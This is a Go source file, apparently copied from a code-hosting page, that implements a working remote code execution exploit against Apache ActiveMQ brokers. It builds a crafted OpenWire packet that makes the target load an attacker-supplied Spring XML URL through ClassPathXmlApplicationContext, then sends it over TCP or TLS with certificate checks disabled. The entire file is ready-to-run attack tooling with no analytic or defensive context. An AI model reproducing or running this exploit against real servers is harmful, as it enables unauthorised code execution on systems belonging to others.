/
main.go
84 lines (68 loc) · 1.96 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
package main
import (
"crypto/tls"
"encoding/hex"
"flag"
"fmt"
"net"
"strconv"
)
func main() {
var (
ip string
port string
url string
useTLS bool
)
flag.StringVar(&ip, "i", "", "ActiveMQ Server IP or Host")
flag.StringVar(&port, "p", "61616", "ActiveMQ Server Port")
flag.StringVar(&url, "u", "", "Spring XML URL")
flag.BoolVar(&useTLS, "t", false, "Use TLS for connection")
flag.Parse()
banner()
if ip == "" || url == "" {
flag.Usage()
return
}
className := "org.springframework.context.support.ClassPathXmlApplicationContext"
message := url
header := "1f00000000000000000001"
body := header + "01" + int2Hex(len(className), 4) + string2Hex(className) + "01" + int2Hex(len(message), 4) + string2Hex(message)
payload := int2Hex(len(body)/2, 8) + body
data, _ := hex.DecodeString(payload)
fmt.Println("[*] Target:", ip+":"+port)
fmt.Println("[*] XML URL:", url)
fmt.Println()
fmt.Println("[*] Sending packet:", payload)
var conn net.Conn
var err error
if useTLS {
conf := &tls.Config{
InsecureSkipVerify: true,
}
conn, err = tls.Dial("tcp", ip+":"+port, conf)
} else {
conn, err = net.Dial("tcp", ip+":"+port)
}
if err != nil {
fmt.Println("[-] Connection error:", err)
return
}
conn.Write(data)
conn.Close()
}
func banner() {
fmt.Println(" _ _ _ __ __ ___ ____ ____ _____ \n / \\ ___| |_(_)_ _____| \\/ |/ _ \\ | _ \\ / ___| ____|\n / _ \\ / __| __| \\ \\ / / _ \\ |\\/| | | | |_____| |_) | | | _| \n / ___ \\ (__| |_| |\\ V / __/ | | | |_| |_____| _ <| |___| |___ \n /_/ \\_\\___|\\__|_| \\_/ \\___|_| |_|\\__\\_\\ |_| \\_\\\\____|_____|\n")
}
func string2Hex(s string) string {
return hex.EncodeToString([]byte(s))
}
func int2Hex(i int, n int) string {
if n == 4 {
return fmt.Sprintf("%04s", strconv.FormatInt(int64(i), 16))
} else if n == 8 {
return fmt.Sprintf("%08s", strconv.FormatInt(int64(i), 16))
} else {
panic("n must be 4 or 8")
}
}